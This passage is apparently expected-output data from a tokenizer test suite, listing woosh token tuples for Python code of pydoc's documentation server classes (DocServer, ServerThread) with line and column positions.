woosh.Token(woosh.NAME, 'HTTPServer', 2366, 32, 2366, 42),
woosh.Token(woosh.OP, ')', 2366, 42, 2366, 43),
woosh.Token(woosh.OP, ':', 2366, 43, 2366, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2366, 44, 2367, 0),
woosh.Token(woosh.INDENT, ' ', 2368, 0, 2368, 8),
woosh.Token(woosh.NAME, 'def', 2368, 8, 2368, 11),
woosh.Token(woosh.NAME, '__init__', 2368, 12, 2368, 20),
woosh.Token(woosh.OP, '(', 2368, 20, 2368, 21),
woosh.Token(woosh.NAME, 'self', 2368, 21, 2368, 25),
woosh.Token(woosh.OP, ',', 2368, 25, 2368, 26),
woosh.Token(woosh.NAME, 'host', 2368, 27, 2368, 31),
woosh.Token(woosh.OP, ',', 2368, 31, 2368, 32),
woosh.Token(woosh.NAME, 'port', 2368, 33, 2368, 37),
woosh.Token(woosh.OP, ',', 2368, 37, 2368, 38),
woosh.Token(woosh.NAME, 'callback', 2368, 39, 2368, 47),
woosh.Token(woosh.OP, ')', 2368, 47, 2368, 48),
woosh.Token(woosh.OP, ':', 2368, 48, 2368, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2368, 49, 2369, 0),
woosh.Token(woosh.INDENT, ' ', 2369, 0, 2369, 12),
woosh.Token(woosh.NAME, 'self', 2369, 12, 2369, 16),
woosh.Token(woosh.OP, '.', 2369, 16, 2369, 17),
woosh.Token(woosh.NAME, 'host', 2369, 17, 2369, 21),
woosh.Token(woosh.OP, '=', 2369, 22, 2369, 23),
woosh.Token(woosh.NAME, 'host', 2369, 24, 2369, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2369, 28, 2370, 0),
woosh.Token(woosh.NAME, 'self', 2370, 12, 2370, 16),
woosh.Token(woosh.OP, '.', 2370, 16, 2370, 17),
woosh.Token(woosh.NAME, 'address', 2370, 17, 2370, 24),
woosh.Token(woosh.OP, '=', 2370, 25, 2370, 26),
woosh.Token(woosh.OP, '(', 2370, 27, 2370, 28),
woosh.Token(woosh.NAME, 'self', 2370, 28, 2370, 32),
woosh.Token(woosh.OP, '.', 2370, 32, 2370, 33),
woosh.Token(woosh.NAME, 'host', 2370, 33, 2370, 37),
woosh.Token(woosh.OP, ',', 2370, 37, 2370, 38),
woosh.Token(woosh.NAME, 'port', 2370, 39, 2370, 43),
woosh.Token(woosh.OP, ')', 2370, 43, 2370, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2370, 44, 2371, 0),
woosh.Token(woosh.NAME, 'self', 2371, 12, 2371, 16),
woosh.Token(woosh.OP, '.', 2371, 16, 2371, 17),
woosh.Token(woosh.NAME, 'callback', 2371, 17, 2371, 25),
woosh.Token(woosh.OP, '=', 2371, 26, 2371, 27),
woosh.Token(woosh.NAME, 'callback', 2371, 28, 2371, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2371, 36, 2372, 0),
woosh.Token(woosh.NAME, 'self', 2372, 12, 2372, 16),
woosh.Token(woosh.OP, '.', 2372, 16, 2372, 17),
woosh.Token(woosh.NAME, 'base', 2372, 17, 2372, 21),
woosh.Token(woosh.OP, '.', 2372, 21, 2372, 22),
woosh.Token(woosh.NAME, '__init__', 2372, 22, 2372, 30),
woosh.Token(woosh.OP, '(', 2372, 30, 2372, 31),
woosh.Token(woosh.NAME, 'self', 2372, 31, 2372, 35),
woosh.Token(woosh.OP, ',', 2372, 35, 2372, 36),
woosh.Token(woosh.NAME, 'self', 2372, 37, 2372, 41),
woosh.Token(woosh.OP, '.', 2372, 41, 2372, 42),
woosh.Token(woosh.NAME, 'address', 2372, 42, 2372, 49),
woosh.Token(woosh.OP, ',', 2372, 49, 2372, 50),
woosh.Token(woosh.NAME, 'self', 2372, 51, 2372, 55),
woosh.Token(woosh.OP, '.', 2372, 55, 2372, 56),
woosh.Token(woosh.NAME, 'handler', 2372, 56, 2372, 63),
woosh.Token(woosh.OP, ')', 2372, 63, 2372, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2372, 64, 2373, 0),
woosh.Token(woosh.NAME, 'self', 2373, 12, 2373, 16),
woosh.Token(woosh.OP, '.', 2373, 16, 2373, 17),
woosh.Token(woosh.NAME, 'quit', 2373, 17, 2373, 21),
woosh.Token(woosh.OP, '=', 2373, 22, 2373, 23),
woosh.Token(woosh.NAME, 'False', 2373, 24, 2373, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2373, 29, 2374, 0),
woosh.Token(woosh.DEDENT, ' ', 2375, 0, 2375, 8),
woosh.Token(woosh.NAME, 'def', 2375, 8, 2375, 11),
woosh.Token(woosh.NAME, 'serve_until_quit', 2375, 12, 2375, 28),
woosh.Token(woosh.OP, '(', 2375, 28, 2375, 29),
woosh.Token(woosh.NAME, 'self', 2375, 29, 2375, 33),
woosh.Token(woosh.OP, ')', 2375, 33, 2375, 34),
woosh.Token(woosh.OP, ':', 2375, 34, 2375, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2375, 35, 2376, 0),
woosh.Token(woosh.INDENT, ' ', 2376, 0, 2376, 12),
woosh.Token(woosh.NAME, 'while', 2376, 12, 2376, 17),
woosh.Token(woosh.NAME, 'not', 2376, 18, 2376, 21),
woosh.Token(woosh.NAME, 'self', 2376, 22, 2376, 26),
woosh.Token(woosh.OP, '.', 2376, 26, 2376, 27),
woosh.Token(woosh.NAME, 'quit', 2376, 27, 2376, 31),
woosh.Token(woosh.OP, ':', 2376, 31, 2376, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2376, 32, 2377, 0),
woosh.Token(woosh.INDENT, ' ', 2377, 0, 2377, 16),
woosh.Token(woosh.NAME, 'rd', 2377, 16, 2377, 18),
woosh.Token(woosh.OP, ',', 2377, 18, 2377, 19),
woosh.Token(woosh.NAME, 'wr', 2377, 20, 2377, 22),
woosh.Token(woosh.OP, ',', 2377, 22, 2377, 23),
woosh.Token(woosh.NAME, 'ex', 2377, 24, 2377, 26),
woosh.Token(woosh.OP, '=', 2377, 27, 2377, 28),
woosh.Token(woosh.NAME, 'select', 2377, 29, 2377, 35),
woosh.Token(woosh.OP, '.', 2377, 35, 2377, 36),
woosh.Token(woosh.NAME, 'select', 2377, 36, 2377, 42),
woosh.Token(woosh.OP, '(', 2377, 42, 2377, 43),
woosh.Token(woosh.OP, '[', 2377, 43, 2377, 44),
woosh.Token(woosh.NAME, 'self', 2377, 44, 2377, 48),
woosh.Token(woosh.OP, '.', 2377, 48, 2377, 49),
woosh.Token(woosh.NAME, 'socket', 2377, 49, 2377, 55),
woosh.Token(woosh.OP, '.', 2377, 55, 2377, 56),
woosh.Token(woosh.NAME, 'fileno', 2377, 56, 2377, 62),
woosh.Token(woosh.OP, '(', 2377, 62, 2377, 63),
woosh.Token(woosh.OP, ')', 2377, 63, 2377, 64),
woosh.Token(woosh.OP, ']', 2377, 64, 2377, 65),
woosh.Token(woosh.OP, ',', 2377, 65, 2377, 66),
woosh.Token(woosh.OP, '[', 2377, 67, 2377, 68),
woosh.Token(woosh.OP, ']', 2377, 68, 2377, 69),
woosh.Token(woosh.OP, ',', 2377, 69, 2377, 70),
woosh.Token(woosh.OP, '[', 2377, 71, 2377, 72),
woosh.Token(woosh.OP, ']', 2377, 72, 2377, 73),
woosh.Token(woosh.OP, ',', 2377, 73, 2377, 74),
woosh.Token(woosh.NUMBER, '1', 2377, 75, 2377, 76),
woosh.Token(woosh.OP, ')', 2377, 76, 2377, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 2377, 77, 2378, 0),
woosh.Token(woosh.NAME, 'if', 2378, 16, 2378, 18),
woosh.Token(woosh.NAME, 'rd', 2378, 19, 2378, 21),
woosh.Token(woosh.OP, ':', 2378, 21, 2378, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2378, 22, 2379, 0),
woosh.Token(woosh.INDENT, ' ', 2379, 0, 2379, 20),
woosh.Token(woosh.NAME, 'self', 2379, 20, 2379, 24),
woosh.Token(woosh.OP, '.', 2379, 24, 2379, 25),
woosh.Token(woosh.NAME, 'handle_request', 2379, 25, 2379, 39),
woosh.Token(woosh.OP, '(', 2379, 39, 2379, 40),
woosh.Token(woosh.OP, ')', 2379, 40, 2379, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2379, 41, 2380, 0),
woosh.Token(woosh.DEDENT, ' ', 2380, 0, 2380, 12),
woosh.Token(woosh.DEDENT, '', 2380, 12, 2380, 12),
woosh.Token(woosh.NAME, 'self', 2380, 12, 2380, 16),
woosh.Token(woosh.OP, '.', 2380, 16, 2380, 17),
woosh.Token(woosh.NAME, 'server_close', 2380, 17, 2380, 29),
woosh.Token(woosh.OP, '(', 2380, 29, 2380, 30),
woosh.Token(woosh.OP, ')', 2380, 30, 2380, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2380, 31, 2381, 0),
woosh.Token(woosh.DEDENT, ' ', 2382, 0, 2382, 8),
woosh.Token(woosh.NAME, 'def', 2382, 8, 2382, 11),
woosh.Token(woosh.NAME, 'server_activate', 2382, 12, 2382, 27),
woosh.Token(woosh.OP, '(', 2382, 27, 2382, 28),
woosh.Token(woosh.NAME, 'self', 2382, 28, 2382, 32),
woosh.Token(woosh.OP, ')', 2382, 32, 2382, 33),
woosh.Token(woosh.OP, ':', 2382, 33, 2382, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2382, 34, 2383, 0),
woosh.Token(woosh.INDENT, ' ', 2383, 0, 2383, 12),
woosh.Token(woosh.NAME, 'self', 2383, 12, 2383, 16),
woosh.Token(woosh.OP, '.', 2383, 16, 2383, 17),
woosh.Token(woosh.NAME, 'base', 2383, 17, 2383, 21),
woosh.Token(woosh.OP, '.', 2383, 21, 2383, 22),
woosh.Token(woosh.NAME, 'server_activate', 2383, 22, 2383, 37),
woosh.Token(woosh.OP, '(', 2383, 37, 2383, 38),
woosh.Token(woosh.NAME, 'self', 2383, 38, 2383, 42),
woosh.Token(woosh.OP, ')', 2383, 42, 2383, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2383, 43, 2384, 0),
woosh.Token(woosh.NAME, 'if', 2384, 12, 2384, 14),
woosh.Token(woosh.NAME, 'self', 2384, 15, 2384, 19),
woosh.Token(woosh.OP, '.', 2384, 19, 2384, 20),
woosh.Token(woosh.NAME, 'callback', 2384, 20, 2384, 28),
woosh.Token(woosh.OP, ':', 2384, 28, 2384, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2384, 29, 2385, 0),
woosh.Token(woosh.INDENT, ' ', 2385, 0, 2385, 16),
woosh.Token(woosh.NAME, 'self', 2385, 16, 2385, 20),
woosh.Token(woosh.OP, '.', 2385, 20, 2385, 21),
woosh.Token(woosh.NAME, 'callback', 2385, 21, 2385, 29),
woosh.Token(woosh.OP, '(', 2385, 29, 2385, 30),
woosh.Token(woosh.NAME, 'self', 2385, 30, 2385, 34),
woosh.Token(woosh.OP, ')', 2385, 34, 2385, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2385, 35, 2386, 0),
woosh.Token(woosh.DEDENT, ' ', 2387, 0, 2387, 4),
woosh.Token(woosh.DEDENT, '', 2387, 4, 2387, 4),
woosh.Token(woosh.DEDENT, '', 2387, 4, 2387, 4),
woosh.Token(woosh.NAME, 'class', 2387, 4, 2387, 9),
woosh.Token(woosh.NAME, 'ServerThread', 2387, 10, 2387, 22),
woosh.Token(woosh.OP, '(', 2387, 22, 2387, 23),
woosh.Token(woosh.NAME, 'threading', 2387, 23, 2387, 32),
woosh.Token(woosh.OP, '.', 2387, 32, 2387, 33),
woosh.Token(woosh.NAME, 'Thread', 2387, 33, 2387, 39),
woosh.Token(woosh.OP, ')', 2387, 39, 2387, 40),
woosh.Token(woosh.OP, ':', 2387, 40, 2387, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2387, 41, 2388, 0),
woosh.Token(woosh.INDENT, ' ', 2389, 0, 2389, 8),
woosh.Token(woosh.NAME, 'def', 2389, 8, 2389, 11),
woosh.Token(woosh.NAME, '__init__', 2389, 12, 2389, 20),
woosh.Token(woosh.OP, '(', 2389, 20, 2389, 21),
woosh.Token(woosh.NAME, 'self', 2389, 21, 2389, 25),
woosh.Token(woosh.OP, ',', 2389, 25, 2389, 26),
woosh.Token(woosh.NAME, 'urlhandler', 2389, 27, 2389, 37),
woosh.Token(woosh.OP, ',', 2389, 37, 2389, 38),
woosh.Token(woosh.NAME, 'host', 2389, 39, 2389, 43),
woosh.Token(woosh.OP, ',', 2389, 43, 2389, 44),
woosh.Token(woosh.NAME, 'port', 2389, 45, 2389, 49),
woosh.Token(woosh.OP, ')', 2389, 49, 2389, 50),
woosh.Token(woosh.OP, ':', 2389, 50, 2389, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 2389, 51, 2390, 0),
woosh.Token(woosh.INDENT, ' ', 2390, 0, 2390, 12),
woosh.Token(woosh.NAME, 'self', 2390, 12, 2390, 16),
woosh.Token(woosh.OP, '.', 2390, 16, 2390, 17),
woosh.Token(woosh.NAME, 'urlhandler', 2390, 17, 2390, 27),
woosh.Token(woosh.OP, '=', 2390, 28, 2390, 29),
woosh.Token(woosh.NAME, 'urlhandler', 2390, 30, 2390, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2390, 40, 2391, 0),
woosh.Token(woosh.NAME, 'self', 2391, 12, 2391, 16),
woosh.Token(woosh.OP, '.', 2391, 16, 2391, 17),
woosh.Token(woosh.NAME, 'host', 2391, 17, 2391, 21),
woosh.Token(woosh.OP, '=', 2391, 22, 2391, 23),
woosh.Token(woosh.NAME, 'host', 2391, 24, 2391, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2391, 28, 2392, 0),
woosh.Token(woosh.NAME, 'self', 2392, 12, 2392, 16),
woosh.Token(woosh.OP, '.', 2392, 16, 2392, 17),
woosh.Token(woosh.NAME, 'port', 2392, 17, 2392, 21),
woosh.Token(woosh.OP, '=', 2392, 22, 2392, 23),
woosh.Token(woosh.NAME, 'int', 2392, 24, 2392, 27),
woosh.Token(woosh.OP, '(', 2392, 27, 2392, 28),
woosh.Token(woosh.NAME, 'port', 2392, 28, 2392, 32),
woosh.Token(woosh.OP, ')', 2392, 32, 2392, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2392, 33, 2393, 0),
woosh.Token(woosh.NAME, 'threading', 2393, 12, 2393, 21),
woosh.Token(woosh.OP, '.', 2393, 21, 2393, 22),
woosh.Token(woosh.NAME, 'Thread', 2393, 22, 2393, 28),
woosh.Token(woosh.OP, '.', 2393, 28, 2393, 29),
woosh.Token(woosh.NAME, '__init__', 2393, 29, 2393, 37),
woosh.Token(woosh.OP, '(', 2393, 37, 2393, 38),
woosh.Token(woosh.NAME, 'self', 2393, 38, 2393, 42),
woosh.Token(woosh.OP, ')', 2393, 42, 2393, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2393, 43, 2394, 0),
woosh.Token(woosh.NAME, 'self', 2394, 12, 2394, 16),
woosh.Token(woosh.OP, '.', 2394, 16, 2394, 17),
woosh.Token(woosh.NAME, 'serving', 2394, 17, 2394, 24),
woosh.Token(woosh.OP, '=', 2394, 25, 2394, 26),
woosh.Token(woosh.NAME, 'False', 2394, 27, 2394, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2394, 32, 2395, 0),
woosh.Token(woosh.NAME, 'self', 2395, 12, 2395, 16),
woosh.Token(woosh.OP, '.', 2395, 16, 2395, 17),
woosh.Token(woosh.NAME, 'error', 2395, 17, 2395, 22),
woosh.Token(woosh.OP, '=', 2395, 23, 2395, 24),
woosh.Token(woosh.NAME, 'None', 2395, 25, 2395, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2395, 29, 2396, 0),
woosh.Token(woosh.DEDENT, ' ', 2397, 0, 2397, 8),
woosh.Token(woosh.NAME, 'def', 2397, 8, 2397, 11),
woosh.Token(woosh.NAME, 'run', 2397, 12, 2397, 15),
woosh.Token(woosh.OP, '(', 2397, 15, 2397, 16),
woosh.Token(woosh.NAME, 'self', 2397, 16, 2397, 20),
woosh.Token(woosh.OP, ')', 2397, 20, 2397, 21),
woosh.Token(woosh.OP, ':', 2397, 21, 2397, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2397, 22, 2398, 0),
woosh.Token(woosh.INDENT, ' ', 2398, 0, 2398, 12),
woosh.Token(woosh.STRING, '"""Start the server."""', 2398, 12, 2398, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2398, 35, 2399, 0),
woosh.Token(woosh.NAME, 'try', 2399, 12, 2399, 15),
woosh.Token(woosh.OP, ':', 2399, 15, 2399, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2399, 16, 2400, 0),
woosh.Token(woosh.INDENT, ' ', 2400, 0, 2400, 16),
woosh.Token(woosh.NAME, 'DocServer', 2400, 16, 2400, 25),
woosh.Token(woosh.OP, '.', 2400, 25, 2400, 26),
woosh.Token(woosh.NAME, 'base', 2400, 26, 2400, 30),
woosh.Token(woosh.OP, '=', 2400, 31, 2400, 32),
woosh.Token(woosh.NAME, 'http', 2400, 33, 2400, 37),
woosh.Token(woosh.OP, '.', 2400, 37, 2400, 38),
woosh.Token(woosh.NAME, 'server', 2400, 38, 2400, 44),
woosh.Token(woosh.OP, '.', 2400, 44, 2400, 45),
woosh.Token(woosh.NAME, 'HTTPServer', 2400, 45, 2400, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2400, 55, 2401, 0),
woosh.Token(woosh.NAME, 'DocServer', 2401, 16, 2401, 25),
woosh.Token(woosh.OP, '.', 2401, 25, 2401, 26),
woosh.Token(woosh.NAME, 'handler', 2401, 26, 2401, 33),
woosh.Token(woosh.OP, '=', 2401, 34, 2401, 35),
woosh.Token(woosh.NAME, 'DocHandler', 2401, 36, 2401, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2401, 46, 2402, 0),
woosh.Token(woosh.NAME, 'DocHandler', 2402, 16, 2402, 26),
woosh.Token(woosh.OP, '.', 2402, 26, 2402, 27),
woosh.Token(woosh.NAME, 'MessageClass', 2402, 27, 2402, 39),
woosh.Token(woosh.OP, '=', 2402, 40, 2402, 41),
woosh.Token(woosh.NAME, 'email', 2402, 42, 2402, 47),
woosh.Token(woosh.OP, '.', 2402, 47, 2402, 48),
woosh.Token(woosh.NAME, 'message', 2402, 48, 2402, 55),
woosh.Token(woosh.OP, '.', 2402, 55, 2402, 56),
woosh.Token(woosh.NAME, 'Message', 2402, 56, 2402, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2402, 63, 2403, 0),
woosh.Token(woosh.NAME, 'DocHandler', 2403, 16, 2403, 26),
woosh.Token(woosh.OP, '.', 2403, 26, 2403, 27),
woosh.Token(woosh.NAME, 'urlhandler', 2403, 27, 2403, 37),
woosh.Token(woosh.OP, '=', 2403, 38, 2403, 39),
woosh.Token(woosh.NAME, 'staticmethod', 2403, 40, 2403, 52),
woosh.Token(woosh.OP, '(', 2403, 52, 2403, 53),
woosh.Token(woosh.NAME, 'self', 2403, 53, 2403, 57),
woosh.Token(woosh.OP, '.', 2403, 57, 2403, 58),
woosh.Token(woosh.NAME, 'urlhandler', 2403, 58, 2403, 68),
woosh.Token(woosh.OP, ')', 2403, 68, 2403, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2403, 69, 2404, 0),
woosh.Token(woosh.NAME, 'docsvr', 2404, 16, 2404, 22),
woosh.Token(woosh.OP, '=', 2404, 23, 2404, 24),
woosh.Token(woosh.NAME, 'DocServer', 2404, 25, 2404, 34),
woosh.Token(woosh.OP, '(', 2404, 34, 2404, 35),
woosh.Token(woosh.NAME, 'self', 2404, 35, 2404, 39),
woosh.Token(woosh.OP, '.', 2404, 39, 2404, 40),
woosh.Token(woosh.NAME, 'host', 2404, 40, 2404, 44),
woosh.Token(woosh.OP, ',', 2404, 44, 2404, 45),
woosh.Token(woosh.NAME, 'self', 2404, 46, 2404, 50),
woosh.Token(woosh.OP, '.', 2404, 50, 2404, 51),
woosh.Token(woosh.NAME, 'port', 2404, 51, 2404, 55),
woosh.Token(woosh.OP, ',', 2404, 55, 2404, 56),
woosh.Token(woosh.NAME, 'self', 2404, 57, 2404, 61),
woosh.Token(woosh.OP, '.', 2404, 61, 2404, 62),
woosh.Token(woosh.NAME, 'ready', 2404, 62, 2404, 67),
woosh.Token(woosh.OP, ')', 2404, 67, 2404, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 2404, 68, 2405, 0),
woosh.Token(woosh.NAME, 'self', 2405, 16, 2405, 20),
woosh.Token(woosh.OP, '.', 2405, 20, 2405, 21),
woosh.Token(woosh.NAME, 'docserver', 2405, 21, 2405, 30),
woosh.Token(woosh.OP, '=', 2405, 31, 2405, 32),
woosh.Token(woosh.NAME, 'docsvr', 2405, 33, 2405, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2405, 39, 2406, 0),
woosh.Token(woosh.NAME, 'docsvr', 2406, 16, 2406, 22),
woosh.Token(woosh.OP, '.', 2406, 22, 2406, 23),
woosh.Token(woosh.NAME, 'serve_until_quit', 2406, 23, 2406, 39),
woosh.Token(woosh.OP, '(', 2406, 39, 2406, 40),
woosh.Token(woosh.OP, ')', 2406, 40, 2406, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2406, 41, 2407, 0),
woosh.Token(woosh.DEDENT, ' ', 2407, 0, 2407, 12),
woosh.Token(woosh.NAME, 'except', 2407, 12, 2407, 18),
woosh.Token(woosh.NAME, 'Exception', 2407, 19, 2407, 28),
woosh.Token(woosh.NAME, 'as', 2407, 29, 2407, 31),
woosh.Token(woosh.NAME, 'e', 2407, 32, 2407, 33),
woosh.Token(woosh.OP, ':', 2407, 33, 2407, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2407, 34, 2408, 0),
woosh.Token(woosh.INDENT, ' ', 2408, 0, 2408, 16),
woosh.Token(woosh.NAME, 'self', 2408, 16, 2408, 20),
woosh.Token(woosh.OP, '.', 2408, 20, 2408, 21),
woosh.Token(woosh.NAME, 'error', 2408, 21, 2408, 26),
woosh.Token(woosh.OP, '=', 2408, 27, 2408, 28),
woosh.Token(woosh.NAME, 'e', 2408, 29, 2408, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2408, 30, 2409, 0),
woosh.Token(woosh.DEDENT, ' ', 2410, 0, 2410, 8),
woosh.Token(woosh.DEDENT, '', 2410, 8, 2410, 8),
woosh.Token(woosh.NAME, 'def', 2410, 8, 2410, 11),
woosh.Token(woosh.NAME, 'ready', 2410, 12, 2410, 17),
woosh.Token(woosh.OP, '(', 2410, 17, 2410, 18),
woosh.Token(woosh.NAME, 'self', 2410, 18, 2410, 22),
woosh.Token(woosh.OP, ',', 2410, 22, 2410, 23),
woosh.Token(woosh.NAME, 'server', 2410, 24, 2410, 30),
woosh.Token(woosh.OP, ')', 2410, 30, 2410, 31),
woosh.Token(woosh.OP, ':', 2410, 31, 2410, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2410, 32, 2411, 0),
woosh.Token(woosh.INDENT, ' ', 2411, 0, 2411, 12),
woosh.Token(woosh.NAME, 'self', 2411, 12, 2411, 16),
woosh.Token(woosh.OP, '.', 2411, 16, 2411, 17),
woosh.Token(woosh.NAME, 'serving', 2411, 17, 2411, 24),
woosh.Token(woosh.OP, '=', 2411, 25, 2411, 26),
woosh.Token(woosh.NAME, 'True', 2411, 27, 2411, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2411, 31, 2412, 0),
woosh.Token(woosh.NAME, 'self', 2412, 12, 2412, 16),
woosh.Token(woosh.OP, '.', 2412, 16, 2412, 17),
woosh.Token(woosh.NAME, 'host', 2412, 17, 2412, 21),
woosh.Token(woosh.OP, '=', 2412, 22, 2412, 23),
woosh.Token(woosh.NAME, 'server', 2412, 24, 2412, 30),
woosh.Token(woosh.OP, '.', 2412, 30, 2412, 31),
woosh.Token(woosh.NAME, 'host', 2412, 31, 2412, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2412, 35, 2413, 0),
woosh.Token(woosh.NAME, 'self', 2413, 12, 2413, 16),
woosh.Token(woosh.OP, '.', 2413, 16, 2413, 17),
woosh.Token(woosh.NAME, 'port', 2413, 17, 2413, 21),
woosh.Token(woosh.OP, '=', 2413, 22, 2413, 23),
woosh.Token(woosh.NAME, 'server', 2413, 24, 2413, 30),
woosh.Token(woosh.OP, '.', 2413, 30, 2413, 31),
woosh.Token(woosh.NAME, 'server_port', 2413, 31, 2413, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2413, 42, 2414, 0),
woosh.Token(woosh.NAME, 'self', 2414, 12, 2414, 16),
woosh.Token(woosh.OP, '.', 2414, 16, 2414, 17),
woosh.Token(woosh.NAME, 'url', 2414, 17, 2414, 20),
woosh.Token(woosh.OP, '=', 2414, 21, 2414, 22),
woosh.Token(woosh.STRING, "'http://%s:%d/'", 2414, 23, 2414, 38),
woosh.Token(woosh.OP, '%', 2414, 39, 2414, 40),
woosh.Token(woosh.OP, '(', 2414, 41, 2414, 42),
woosh.Token(woosh.NAME, 'self', 2414, 42, 2414, 46),
woosh.Token(woosh.OP, '.', 2414, 46, 2414, 47),
woosh.Token(woosh.NAME, 'host', 2414, 47, 2414, 51),
woosh.Token(woosh.OP, ',', 2414, 51, 2414, 52),
woosh.Token(woosh.NAME, 'self', 2414, 53, 2414, 57),
woosh.Token(woosh.OP, '.', 2414, 57, 2414, 58),
woosh.Token(woosh.NAME, 'port', 2414, 58, 2414, 62),
woosh.Token(woosh.OP, ')', 2414, 62, 2414, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2414, 63, 2415, 0),
woosh.Token(woosh.DEDENT, ' ', 2416, 0, 2416, 8),
woosh.Token(woosh.NAME, 'def', 2416, 8, 2416, 11),
woosh.Token(woosh.NAME, 'stop', 2416, 12, 2416, 16),
woosh.Token(woosh.OP, '(', 2416, 16, 2416, 17),
woosh.Token(woosh.NAME, 'self', 2416, 17, 2416, 21),
woosh.Token(woosh.OP, ')', 2416, 21, 2416, 22),
woosh.Token(woosh.OP, ':', 2416, 22, 2416, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2416, 23, 2417, 0),
woosh.Token(woosh.INDENT, ' ', 2417, 0, 2417, 12),
woosh.Token(woosh.STRING, '"""Stop the server and this thread nicely"""', 2417, 12, 2417, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 2417, 56, 2418, 0),
woosh.Token(woosh.NAME, 'self', 2418, 12, 2418, 16),
woosh.Token(woosh.OP, '.', 2418, 16, 2418, 17),
woosh.Token(woosh.NAME, 'docserver', 2418, 17, 2418, 26),
woosh.Token(woosh.OP, '.', 2418, 26, 2418, 27),
woosh.Token(woosh.NAME, 'quit', 2418, 27, 2418, 31),
woosh.Token(woosh.OP, '=', 2418, 32, 2418, 33),
woosh.Token(woosh.NAME, 'True', 2418, 34, 2418, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2418, 38, 2419, 0),
woosh.Token(woosh.NAME, 'self', 2419, 12, 2419, 16),
woosh.Token(woosh.OP, '.', 2419, 16, 2419, 17),
woosh.Token(woosh.NAME, 'join', 2419, 17, 2419, 21),
woosh.Token(woosh.OP, '(', 2419, 21, 2419, 22),
woosh.Token(woosh.OP, ')', 2419, 22, 2419, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2419, 23, 2420, 0),
woosh.Token(woosh.COMMENT, '# explicitly break a reference cycle: DocServer.callback', 2420, 12, 2420, 68),
woosh.Token(woosh.COMMENT, '# has indirectly a reference to ServerThread.', 2421, 12, 2421, 57),
woosh.Token(woosh.NAME, 'self', 2422, 12, 2422, 16),
woosh.Token(woosh.OP, '.', 2422, 16, 2422, 17),
woosh.Token(woosh.NAME, 'docserver', 2422, 17, 2422, 26),
woosh.Token(woosh.OP, '=', 2422, 27, 2422, 28),
woosh.Token(woosh.NAME, 'None', 2422, 29, 2422, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2422, 33, 2423, 0),
woosh.Token(woosh.NAME, 'self', 2423, 12, 2423, 16),
woosh.Token(woosh.OP, '.', 2423, 16, 2423, 17),
woosh.Token(woosh.NAME, 'serving', 2423, 17, 2423, 24),
woosh.Token(woosh.OP, '=', 2423, 25, 2423, 26),
woosh.Token(woosh.NAME, 'False', 2423, 27, 2423, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2423, 32, 2424, 0),
woosh.Token(woosh.NAME, 'self', 2424, 12, 2424, 16),
woosh.Token(woosh.OP, '.', 2424, 16, 2424, 17),
woosh.Token(woosh.NAME, 'url', 2424, 17, 2424, 20),
woosh.Token(woosh.OP, '=', 2424, 21, 2424, 22),
woosh.Token(woosh.NAME, 'None', 2424, 23, 2424, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2424, 27, 2425, 0),
woosh.Token(woosh.DEDENT, ' ', 2426, 0, 2426, 4),
woosh.Token(woosh.DEDENT, '', 2426, 4, 2426, 4),
woosh.Token(woosh.NAME, 'thread', 2426, 4, 2426, 10),
woosh.Token(woosh.OP, '=', 2426, 11, 2426, 12),
woosh.Token(woosh.NAME, 'ServerThread', 2426, 13, 2426, 25),
woosh.Token(woosh.OP, '(', 2426, 25, 2426, 26),
woosh.Token(woosh.NAME, 'urlhandler', 2426, 26, 2426, 36),
woosh.Token(woosh.OP, ',', 2426, 36, 2426, 37),
woosh.Token(woosh.NAME, 'hostname', 2426, 38, 2426, 46),
woosh.Token(woosh.OP, ',', 2426, 46, 2426, 47),
woosh.Token(woosh.NAME, 'port', 2426, 48, 2426, 52),
woosh.Token(woosh.OP, ')', 2426, 52, 2426, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2426, 53, 2427, 0),
woosh.Token(woosh.NAME, 'thread', 2427, 4, 2427, 10),
